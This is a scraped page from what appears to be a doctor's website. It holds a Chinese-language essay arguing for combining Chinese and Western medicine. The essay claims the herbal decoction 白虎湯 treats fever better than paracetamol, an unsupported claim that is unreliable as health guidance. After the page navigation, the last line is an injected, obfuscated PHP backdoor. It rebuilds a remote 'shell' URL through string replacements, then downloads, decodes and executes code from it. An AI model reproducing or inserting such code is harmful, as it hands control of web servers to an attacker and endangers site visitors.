收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 中西整合,病患有福氣
中西整合,病患有福氣 列印 E-mail

        既然中、西醫學各有其利弊,如何整合中、西醫學運用在臨床治療患者,身為醫師的人一定要明瞭兩者各自的優缺點,再依照「急則治標,緩則治本」的原則,使用其中一種或合併使用兩種不同的醫療模式,實踐「以患者為中心」的目標,並尋找對患者最有利的醫療方法。

西醫長處在數據科學化:
        西醫的長處在診斷的數據科學化,多用於急症、表症,缺點在把人切割成一個個不同的器官,且不重視其關連性。

又,藥物多為單一成份,當成份能對症時,效果明顯,但當成份不能對症時,則立見副作用;就好像一把刀對著關節切下去,方向對了迎刃而解,方向錯了,問題沒解決,還會造成傷害。

中醫長處在經驗法則:
中醫的長處在經驗法則,以及把人視為一個小宇宙,並重視臟腑之間的關連性,強調人身心的整體性。例如:五行生剋的觀念,普遍大量用於命理、風水…上。如果中醫師能夠在臨床上靈活運用該原理,那對疾病的診治將有撥雲見日之效。

又,中藥為複方,強調「君、臣、佐、使」,各成分之間像是一個相輔相成的團隊。它的優點是攻擊之餘,尚有補給保養的效果,多用於緩症、裡症,缺點在因為不是單一成分,效果有時不是那麼直接、快速。

        中、西醫學如何攜手合作,除了官方的政策倡導以及修改法令外,更重要的是,中、西醫師應該各自拋開門戶之見,相互學習對方的優點與長處,來彌補自己的不足。

臨床上,我們常看見在有些疾病上,醫藥效果與速度遠優於西醫藥,何況有西醫師在抗生素、止痛藥、類固醇的濫用,令人詬病!

我絕不反對使用抗生素、止痛藥、類固醇這些藥物,但是我堅決反對濫用這些藥物。如果我們能在中醫藥的領域中尋找可以取代這些藥物,或者減少這些藥物副作用的方法,例如治療患者的發燒,我常以中藥的白虎湯來替代西藥的普拿疼,效果更好且不易盜汗。我想這種治療疾病的替代醫療模式,才真正是病患的福祉。

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));